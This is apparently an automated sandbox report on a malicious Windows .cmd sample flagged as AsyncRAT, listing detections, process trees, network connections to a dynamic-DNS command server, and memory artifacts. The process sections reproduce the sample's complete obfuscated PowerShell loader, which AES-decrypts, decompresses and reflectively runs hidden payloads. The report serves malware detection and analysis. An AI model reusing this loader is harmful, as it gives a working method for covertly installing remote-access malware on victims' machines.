Malware Analysis Report

2024-10-23 19:26

Sample ID 240524-qr1fssfh56
Target c2ab16802765ebcfe21f21aabd351c846bbea9140835c23579f9d0e26f9bdf2c.cmd
SHA256 c2ab16802765ebcfe21f21aabd351c846bbea9140835c23579f9d0e26f9bdf2c
Tags
execution asyncrat venom clients rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c2ab16802765ebcfe21f21aabd351c846bbea9140835c23579f9d0e26f9bdf2c

Threat Level: Known bad

The file c2ab16802765ebcfe21f21aabd351c846bbea9140835c23579f9d0e26f9bdf2c.cmd was found to be: Known bad.

Malicious Activity Summary

execution asyncrat venom clients rat

AsyncRat

Async RAT payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-24 13:30

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-24 13:30

Reported

2024-05-24 13:32

Platform

win7-20240221-en

Max time kernel

120s

Max time network

121s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\c2ab16802765ebcfe21f21aabd351c846bbea9140835c23579f9d0e26f9bdf2c.cmd"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\c2ab16802765ebcfe21f21aabd351c846bbea9140835c23579f9d0e26f9bdf2c.cmd"

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lqGtFYajP4dvsKIWnOQi409E1v8ult6DFNGJrf47kZE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x2DBEVvQmBOCho9gd+n1bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oKEyn=New-Object System.IO.MemoryStream(,$param_var); $ZXvXs=New-Object System.IO.MemoryStream; $rdMmY=New-Object System.IO.Compression.GZipStream($oKEyn, [IO.Compression.CompressionMode]::Decompress); $rdMmY.CopyTo($ZXvXs); $rdMmY.Dispose(); $oKEyn.Dispose(); $ZXvXs.Dispose(); $ZXvXs.ToArray();}function execute_function($param_var,$param2_var){ $pUJev=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oJbpm=$pUJev.EntryPoint; $oJbpm.Invoke($null, $param2_var);}$XSGCc = 'C:\Users\Admin\AppData\Local\Temp\c2ab16802765ebcfe21f21aabd351c846bbea9140835c23579f9d0e26f9bdf2c.cmd';$host.UI.RawUI.WindowTitle = $XSGCc;$WmqwT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XSGCc).Split([Environment]::NewLine);foreach ($VEuit in $WmqwT) { if ($VEuit.StartsWith('kJooVBlfXESpuyhzrHrv')) { $iEGsi=$VEuit.Substring(20); break; }}$payloads_var=[string[]]$iEGsi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

Network

N/A

Files

memory/1768-4-0x000007FEF5D5E000-0x000007FEF5D5F000-memory.dmp

memory/1768-6-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmp

memory/1768-5-0x000000001B720000-0x000000001BA02000-memory.dmp

memory/1768-7-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmp

memory/1768-8-0x00000000029E0000-0x00000000029E8000-memory.dmp

memory/1768-9-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmp

memory/1768-10-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmp

memory/1768-11-0x000007FEF5D5E000-0x000007FEF5D5F000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-24 13:30

Reported

2024-05-24 13:32

Platform

win10v2004-20240426-en

Max time kernel

131s

Max time network

144s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\c2ab16802765ebcfe21f21aabd351c846bbea9140835c23579f9d0e26f9bdf2c.cmd"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3956 wrote to memory of 4196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3956 wrote to memory of 4196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3956 wrote to memory of 4044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3956 wrote to memory of 4044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3956 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3956 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\c2ab16802765ebcfe21f21aabd351c846bbea9140835c23579f9d0e26f9bdf2c.cmd"

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lqGtFYajP4dvsKIWnOQi409E1v8ult6DFNGJrf47kZE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x2DBEVvQmBOCho9gd+n1bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oKEyn=New-Object System.IO.MemoryStream(,$param_var); $ZXvXs=New-Object System.IO.MemoryStream; $rdMmY=New-Object System.IO.Compression.GZipStream($oKEyn, [IO.Compression.CompressionMode]::Decompress); $rdMmY.CopyTo($ZXvXs); $rdMmY.Dispose(); $oKEyn.Dispose(); $ZXvXs.Dispose(); $ZXvXs.ToArray();}function execute_function($param_var,$param2_var){ $pUJev=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oJbpm=$pUJev.EntryPoint; $oJbpm.Invoke($null, $param2_var);}$XSGCc = 'C:\Users\Admin\AppData\Local\Temp\c2ab16802765ebcfe21f21aabd351c846bbea9140835c23579f9d0e26f9bdf2c.cmd';$host.UI.RawUI.WindowTitle = $XSGCc;$WmqwT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XSGCc).Split([Environment]::NewLine);foreach ($VEuit in $WmqwT) { if ($VEuit.StartsWith('kJooVBlfXESpuyhzrHrv')) { $iEGsi=$VEuit.Substring(20); break; }}$payloads_var=[string[]]$iEGsi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 xvern429.duckdns.org udp
US 12.202.180.134:8890 xvern429.duckdns.org tcp
US 8.8.8.8:53 134.180.202.12.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp

Files

memory/2440-0-0x00007FF8C56D3000-0x00007FF8C56D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fsh43bx0.jhl.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2440-6-0x00000217DF970000-0x00000217DF992000-memory.dmp

memory/2440-11-0x00007FF8C56D0000-0x00007FF8C6191000-memory.dmp

memory/2440-12-0x00007FF8C56D0000-0x00007FF8C6191000-memory.dmp

memory/2440-13-0x00000217DFE80000-0x00000217DFEC4000-memory.dmp

memory/2440-14-0x00000217DFF50000-0x00000217DFFC6000-memory.dmp

memory/2440-15-0x00000217DFAD0000-0x00000217DFAE0000-memory.dmp

memory/2440-17-0x00007FF8E3030000-0x00007FF8E30EE000-memory.dmp

memory/2440-16-0x00007FF8E3930000-0x00007FF8E3B25000-memory.dmp

memory/2440-18-0x00000217DFE30000-0x00000217DFE46000-memory.dmp

memory/2440-19-0x00000217DFE40000-0x00000217DFE56000-memory.dmp

memory/2440-20-0x00007FF8C56D0000-0x00007FF8C6191000-memory.dmp

memory/2440-23-0x00007FF8C56D0000-0x00007FF8C6191000-memory.dmp

memory/2440-25-0x00007FF8C56D0000-0x00007FF8C6191000-memory.dmp

memory/2440-26-0x00007FF8C56D3000-0x00007FF8C56D5000-memory.dmp

memory/2440-27-0x00007FF8C56D0000-0x00007FF8C6191000-memory.dmp

memory/2440-28-0x00007FF8C56D0000-0x00007FF8C6191000-memory.dmp

memory/2440-29-0x00007FF8C56D0000-0x00007FF8C6191000-memory.dmp